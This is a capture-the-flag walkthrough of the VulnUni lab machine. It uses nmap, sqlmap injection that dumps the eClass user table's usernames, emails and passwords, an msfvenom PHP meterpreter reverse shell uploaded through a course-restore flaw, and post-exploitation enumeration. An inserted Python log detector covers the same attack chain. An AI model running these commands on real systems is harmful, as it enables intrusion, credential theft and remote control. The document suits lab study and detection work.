VulnUni
Get it at VulnUni: 1.0.1
The machine is classified as easy, so a good starting point.
My first machine after a few years, and the main problem was setting up my lab. Long story short, I ended up with a Kali image that I imported into VirtualBox. I have never had so many errors installing Kali Linux before.
I will try to document the relevant steps, as I did for my first attempt at the OSCP exam. So let's get into the server:
First we need to know the IP address, which is easy in your own LAN, but we can check with netdiscover or nmap.
One of the first things I always did in the past is a full port scan with nmap:
nmap -A -p- 192.168.178.47
Nmap shows us that only port 80 is open and an Apache web server is running on it.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 23:14 BST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 33.04% done; ETC: 23:16 (0:01:31 remaining)
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 34.61% done; ETC: 23:16 (0:01:29 remaining)
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 34.81% done; ETC: 23:16 (0:01:28 remaining)
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 34.99% done; ETC: 23:16 (0:01:27 remaining)
Nmap scan report for vulnuni.fritz.box (192.168.178.47)
Host is up (0.011s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: VulnUni – We train the top Information Security Professionals
Service detection performed.
Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.26 seconds
My first thought for the web server was to start with Burp, as this is one of the tools I used very often for websites in the past. Unfortunately the free version is too limited in functionality, so I tested ZAP instead.
Enter the IP address and click on Attack.

ZAP discovered a lot of pages, but I tried to find some more with the DirBuster option.

As a lot of the pages link to vulnuni.local, I added that name to my /etc/hosts file so requests to it are routed to the virtual machine.
I found an application called “eClass” and, after some clicks, a login page: https://vulnuni.local/vulnuni-eclass/index.php

A Google search about this tool shows two exploits:
The first one needs an active account, but the second one doesn't need an account, so I started with this exploit. With ZAP you can set breakpoints for every request under Tools -> Toggle Break on All Requests. Now enter some values into the login form and press Enter. In ZAP you will see the request you just made:
Now we need to save the request. Right-click on the intercepted request and choose Save Raw -> Request -> All.
For the next step, open a terminal and run:
sqlmap -r eclasslogin.raw --level=5 --risk=3 -v
The exploit description is pretty good! Sqlmap will ask some questions, which can all be answered with Yes. After a while the following output is presented:

Now we can work with the session sqlmap stores for us:
- sqlmap -r eclasslogin.raw -v --current-db [result is eclass]
- sqlmap -r eclasslogin.raw -v -D eclass -T user -C username,email,password --dump [this dumps the columns username, email and password from the table user]
To get the tables and columns we would need to enumerate the database step by step, but I skipped this here. A good tutorial can be found here: https://www.binarytides.com/sqlmap-hacking-tutorial/
After a while we get the accounts which are already registered with the information we requested:

Sqlmap also stores the result in a CSV file, so there is no need to copy the terminal output.
Now we have an account and we can start with the next steps.
Remember the other exploit I listed above. It tells us how to upload files to the system. So I tried the following:
Create a PHP meterpreter reverse shell:
# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.178.50 LPORT=12000 -f raw > shell.php
# cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
Next we need to open a handler:
- Start msfconsole
- use exploit/multi/handler
- set PAYLOAD php/meterpreter_reverse_tcp
- set LHOST (your attacker IP)
- set LPORT (the same port you configured in the web shell, I used 12000)
- exploit
Now upload the shell, compressed in a zip file, to the eClass system.
The relevant section from the exploit page:
You have to login to the platform as an administrator or user with admin rights. You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results. Once you have logged in as admin: 1) Navigate to 127.0.0.1/modules/course_info/restore_course.php 2) Upload your .php shell compressed in a .zip file 3) Ignore the error message 4) Your PHP file is now uploaded to 127.0.0.1/cources/tmpUnzipping/[your-shell-name].php
The URL in my case is then: https://vulnuni.local/vulnuni-eclass/courses/tmpUnzipping/shell12000.php (there is a typo in the path given in the description).
Now your meterpreter session should be triggered.
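As an added example (not part of the original writeup), here is the defender's view of the chain above: a small Python detector, run over constructed Apache access-log lines, that flags its three stages (sqlmap's default User-Agent hitting the login form, the POST to modules/course_info/restore_course.php, and PHP being served from courses/tmpUnzipping/). The log lines, client IPs and the /vulnuni-eclass/ prefix are constructed assumptions, not data from the target.

```python
import re

# Constructed Apache combined-format log lines modelled on this walkthrough's
# request chain (not taken from the original page or the VulnUni image).
SAMPLE_LOG = [
    '192.168.178.50 - - [28/Apr/2020:23:30:01 +0100] "GET /vulnuni-eclass/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.178.50 - - [28/Apr/2020:23:30:02 +0100] "POST /vulnuni-eclass/index.php HTTP/1.1" 200 5120 "-" "sqlmap/1.4#stable (http://sqlmap.org)"',
    '192.168.178.50 - - [28/Apr/2020:23:30:02 +0100] "POST /vulnuni-eclass/index.php HTTP/1.1" 200 5120 "-" "sqlmap/1.4#stable (http://sqlmap.org)"',
    '192.168.178.50 - - [28/Apr/2020:23:41:10 +0100] "POST /vulnuni-eclass/modules/course_info/restore_course.php HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
    '192.168.178.50 - - [28/Apr/2020:23:41:15 +0100] "GET /vulnuni-eclass/courses/tmpUnzipping/shell12000.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.178.51 - - [28/Apr/2020:23:42:00 +0100] "GET /vulnuni-eclass/courses/tmpUnzipping/notes.txt HTTP/1.1" 404 200 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Split one combined-format access log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(lines):
    """Return (rule, ip, path) findings for the three stages of the chain, de-duplicated."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        # Stage 1: sqlmap announces itself in the User-Agent unless --random-agent is used.
        if "sqlmap" in rec["ua"].lower():
            findings.append(("sqlmap-user-agent", rec["ip"], path))
        # Stage 2: a course-restore upload is rare in normal use and worth a look every time.
        if rec["method"] == "POST" and path.endswith("/modules/course_info/restore_course.php"):
            findings.append(("course-restore-upload", rec["ip"], path))
        # Stage 3: PHP requested from the unzip scratch directory is the web shell itself.
        if "/courses/tmpUnzipping/" in path and path.lower().endswith(".php"):
            findings.append(("php-in-tmpUnzipping", rec["ip"], path))
    # The same (rule, ip, path) seen twice collapses to one finding, in first-seen order.
    return list(dict.fromkeys(findings))

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(*finding)
```

A real deployment would additionally alert on any request to tmpUnzipping/ that returns 200, since the directory is only meant to hold transient course archives.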

We see that the user is www-data, and now we can try to get more information about the system. Remember, we don't have any passwords for the system users, only for the eClass web application.
A cool script is linuxprivchecker from this GitHub repo: https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
To work easier we can open a tty shell with python:
python -c 'import pty; pty.spawn("/bin/sh")'
You can get the script directly onto the victim with wget:
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
Then run python ./linuxprivchecker.py; it will produce a lot of information.
Very important is the kernel version. You get it with uname -a:
Linux vulnuni 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Go further and collect more information. You will find the first flag in the home directory, which is accessible for our account.

Another cool script is linPEAS.
I used it and piped the output to a txt file, which I then downloaded with the meterpreter command download.